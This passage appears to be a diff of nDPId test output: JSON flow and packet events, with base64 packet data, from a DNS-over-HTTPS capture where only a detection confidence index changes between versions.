E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R88DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6lHCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxywR21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"} 